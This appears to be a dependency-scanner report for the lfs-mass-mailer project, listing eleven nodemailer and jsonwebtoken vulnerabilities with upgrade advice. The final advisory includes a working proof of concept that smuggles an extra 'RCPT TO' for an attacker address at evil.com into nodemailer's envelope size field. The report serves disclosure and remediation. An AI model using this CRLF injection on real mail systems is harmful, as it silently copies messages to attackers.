Vulnerabilities

11 via 11 paths

Dependencies

159

Source

GitHub

Find, fix and prevent vulnerabilities in your code.

Severity
  • 3
  • 7
  • 1
Status
  • 11
  • 0
  • 0

high severity

Uncontrolled Recursion

  • Vulnerable module: nodemailer
  • Introduced through: nodemailer@6.10.1

Detailed paths

  • Introduced through: lfs-mass-mailer@UBC-LFS/lfs-mass-mailer nodemailer@6.10.1
    Remediation: Upgrade to nodemailer@7.0.11.

Overview

nodemailer is an Easy as cake e-mail sending from your Node.js applications

Affected versions of this package are vulnerable to Uncontrolled Recursion in the addressparser function. An attacker can cause the process to terminate immediately by sending an email address header containing deeply nested groups, separated by many :s.

Remediation

Upgrade nodemailer to version 7.0.11 or higher.

References

high severity
new

CRLF Injection

  • Vulnerable module: nodemailer
  • Introduced through: nodemailer@6.10.1

Detailed paths

  • Introduced through: lfs-mass-mailer@UBC-LFS/lfs-mass-mailer nodemailer@6.10.1
    Remediation: Upgrade to nodemailer@8.0.9.

Overview

nodemailer is an Easy as cake e-mail sending from your Node.js applications

Affected versions of this package are vulnerable to CRLF Injection via the comment field in the list message option. An attacker can inject arbitrary headers into generated email messages by supplying crafted input containing CRLF sequences.

Remediation

Upgrade nodemailer to version 8.0.9 or higher.

References

high severity
new

Server-side Request Forgery (SSRF)

  • Vulnerable module: nodemailer
  • Introduced through: nodemailer@6.10.1

Detailed paths

  • Introduced through: lfs-mass-mailer@UBC-LFS/lfs-mass-mailer nodemailer@6.10.1
    Remediation: Upgrade to nodemailer@9.0.1.

Overview

nodemailer is an Easy as cake e-mail sending from your Node.js applications

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) via the message-level raw option bypassing disableFileAccess and disableUrlAccess flags. An attacker can access arbitrary local files or perform server-side request forgery by supplying crafted input to the raw field, which bypasses intended access restrictions and results in sensitive data being sent to an attacker-controlled recipient.

Remediation

Upgrade nodemailer to version 9.0.1 or higher.

References

medium severity

CRLF Injection

  • Vulnerable module: nodemailer
  • Introduced through: nodemailer@6.10.1

Detailed paths

  • Introduced through: lfs-mass-mailer@UBC-LFS/lfs-mass-mailer nodemailer@6.10.1
    Remediation: Upgrade to nodemailer@8.0.5.

Overview

nodemailer is an Easy as cake e-mail sending from your Node.js applications

Affected versions of this package are vulnerable to CRLF Injection via the name configuration configuration option. An attacker can inject arbitrary SMTP commands by supplying carriage return and line feed sequences, enabling unauthorized email sending, sender spoofing, and phishing attacks before authentication occurs.

Remediation

Upgrade nodemailer to version 8.0.5 or higher.

References

medium severity

Interpretation Conflict

  • Vulnerable module: nodemailer
  • Introduced through: nodemailer@6.10.1

Detailed paths

  • Introduced through: lfs-mass-mailer@UBC-LFS/lfs-mass-mailer nodemailer@6.10.1
    Remediation: Upgrade to nodemailer@7.0.7.

Overview

nodemailer is an Easy as cake e-mail sending from your Node.js applications

Affected versions of this package are vulnerable to Interpretation Conflict due to improper handling of quoted local-parts containing @. An attacker can cause emails to be sent to unintended external recipients or bypass domain-based access controls by crafting specially formatted email addresses with quoted local-parts containing the @ character.

Remediation

Upgrade nodemailer to version 7.0.7 or higher.

References

medium severity

Use of a Broken or Risky Cryptographic Algorithm

  • Vulnerable module: jsonwebtoken
  • Introduced through: jsonwebtoken@8.5.1

Detailed paths

  • Introduced through: lfs-mass-mailer@UBC-LFS/lfs-mass-mailer jsonwebtoken@8.5.1
    Remediation: Upgrade to jsonwebtoken@9.0.0.

Overview

jsonwebtoken is a JSON Web Token implementation (symmetric and asymmetric)

Affected versions of this package are vulnerable to Use of a Broken or Risky Cryptographic Algorithm such that the library can be misconfigured to use legacy, insecure key types for signature verification. For example, DSA keys could be used with the RS256 algorithm.

Exploitability

Users are affected when using an algorithm and a key type other than the combinations mentioned below:

EC: ES256, ES384, ES512

RSA: RS256, RS384, RS512, PS256, PS384, PS512

RSA-PSS: PS256, PS384, PS512

And for Elliptic Curve algorithms:

ES256: prime256v1

ES384: secp384r1

ES512: secp521r1

Workaround

Users who are unable to upgrade to the fixed version can use the allowInvalidAsymmetricKeyTypes option to true in the sign() and verify() functions to continue usage of invalid key type/algorithm combination in 9.0.0 for legacy compatibility.

Remediation

Upgrade jsonwebtoken to version 9.0.0 or higher.

References

medium severity

Improper Restriction of Security Token Assignment

  • Vulnerable module: jsonwebtoken
  • Introduced through: jsonwebtoken@8.5.1

Detailed paths

  • Introduced through: lfs-mass-mailer@UBC-LFS/lfs-mass-mailer jsonwebtoken@8.5.1
    Remediation: Upgrade to jsonwebtoken@9.0.0.

Overview

jsonwebtoken is a JSON Web Token implementation (symmetric and asymmetric)

Affected versions of this package are vulnerable to Improper Restriction of Security Token Assignment via the secretOrPublicKey argument due to misconfigurations of the key retrieval function jwt.verify(). Exploiting this vulnerability might result in incorrect verification of forged tokens when tokens signed with an asymmetric public key could be verified with a symmetric HS256 algorithm.

Note: This vulnerability affects your application if it supports the usage of both symmetric and asymmetric keys in jwt.verify() implementation with the same key retrieval function.

Remediation

Upgrade jsonwebtoken to version 9.0.0 or higher.

References

medium severity

Improper Authentication

  • Vulnerable module: jsonwebtoken
  • Introduced through: jsonwebtoken@8.5.1

Detailed paths

  • Introduced through: lfs-mass-mailer@UBC-LFS/lfs-mass-mailer jsonwebtoken@8.5.1
    Remediation: Upgrade to jsonwebtoken@9.0.0.

Overview

jsonwebtoken is a JSON Web Token implementation (symmetric and asymmetric)

Affected versions of this package are vulnerable to Improper Authentication such that the lack of algorithm definition in the jwt.verify() function can lead to signature validation bypass due to defaulting to the none algorithm for signature verification.

Exploitability

Users are affected only if all of the following conditions are true for the jwt.verify() function:

  1. A token with no signature is received.

  2. No algorithms are specified.

  3. A falsy (e.g., null, false, undefined) secret or key is passed.

Remediation

Upgrade jsonwebtoken to version 9.0.0 or higher.

References

medium severity
new

Improper Certificate Validation

  • Vulnerable module: nodemailer
  • Introduced through: nodemailer@6.10.1

Detailed paths

  • Introduced through: lfs-mass-mailer@UBC-LFS/lfs-mass-mailer nodemailer@6.10.1
    Remediation: Upgrade to nodemailer@8.0.8.

Overview

nodemailer is an Easy as cake e-mail sending from your Node.js applications

Affected versions of this package are vulnerable to Improper Certificate Validation due to the use of rejectUnauthorized: false in the internal HTTPS client, which disables TLS certificate verification during OAuth2 token retrieval. An attacker can intercept sensitive OAuth2 credentials and tokens by performing a machine-in-the-middle attack on the HTTPS connection.

Remediation

Upgrade nodemailer to version 8.0.8 or higher.

References

medium severity
new

Missing Authorization

  • Vulnerable module: nodemailer
  • Introduced through: nodemailer@6.10.1

Detailed paths

  • Introduced through: lfs-mass-mailer@UBC-LFS/lfs-mass-mailer nodemailer@6.10.1
    Remediation: Upgrade to nodemailer@8.0.9.

Overview

nodemailer is an Easy as cake e-mail sending from your Node.js applications

Affected versions of this package are vulnerable to Missing Authorization in the jsonTransport message, which fails to enforce file and URL access restrictions during message normalization. An attacker can access local files or trigger outbound HTTP requests by supplying crafted message content fields such as attachment path or text.href.

Remediation

Upgrade nodemailer to version 8.0.9 or higher.

References

low severity

CRLF Injection

  • Vulnerable module: nodemailer
  • Introduced through: nodemailer@6.10.1

Detailed paths

  • Introduced through: lfs-mass-mailer@UBC-LFS/lfs-mass-mailer nodemailer@6.10.1
    Remediation: Upgrade to nodemailer@8.0.4.

Overview

nodemailer is an Easy as cake e-mail sending from your Node.js applications

Affected versions of this package are vulnerable to CRLF Injection via the envelope.size parameter in the sendMail function. An attacker can inject arbitrary SMTP commands by supplying CRLF characters in the size property, which are concatenated directly into the SMTP command stream. This can result in unauthorized recipients being added to outgoing emails or other SMTP commands being executed.

Note:

This is only exploitable if the application explicitly passes a custom envelope object with a user-controlled size property to the mail sending process.

PoC

const net = require('net');
const nodemailer = require('nodemailer');

// Minimal SMTP server that logs raw commands
const server = net.createServer(socket => {
    socket.write('220 localhost ESMTP\r\n');
    let buffer = '';
    socket.on('data', chunk => {
        buffer += chunk.toString();
        const lines = buffer.split('\r\n');
        buffer = lines.pop();
        for (const line of lines) {
            if (!line) continue;
            console.log('C:', line);
            if (line.startsWith('EHLO')) {
                socket.write('250-localhost\r\n250-SIZE 10485760\r\n250 OK\r\n');
            } else if (line.startsWith('MAIL FROM')) {
                socket.write('250 OK\r\n');
            } else if (line.startsWith('RCPT TO')) {
                socket.write('250 OK\r\n');
            } else if (line === 'DATA') {
                socket.write('354 Start\r\n');
            } else if (line === '.') {
                socket.write('250 OK\r\n');
            } else if (line.startsWith('QUIT')) {
                socket.write('221 Bye\r\n');
                socket.end();
            }
        }
    });
});

server.listen(0, '127.0.0.1', () => {
    const port = server.address().port;
    console.log('SMTP server on port', port);
    console.log('Sending email with injected RCPT TO...\n');

    const transporter = nodemailer.createTransport({
        host: '127.0.0.1',
        port,
        secure: false,
        tls: { rejectUnauthorized: false },
    });

    transporter.sendMail({
        from: 'sender@example.com',
        to: 'recipient@example.com',
        subject: 'Normal email',
        text: 'This is a normal email.',
        envelope: {
            from: 'sender@example.com',
            to: ['recipient@example.com'],
            size: '100\r\nRCPT TO:<attacker@evil.com>',
        },
    }, (err) => {
        if (err) console.error('Error:', err.message);
        console.log('\nExpected output above:');
        console.log('  C: MAIL FROM:<sender@example.com> SIZE=100');
        console.log('  C: RCPT TO:<attacker@evil.com>        <-- INJECTED');
        console.log('  C: RCPT TO:<recipient@example.com>');
        server.close();
        transporter.close();
    });
});

Remediation

Upgrade nodemailer to version 8.0.4 or higher.

References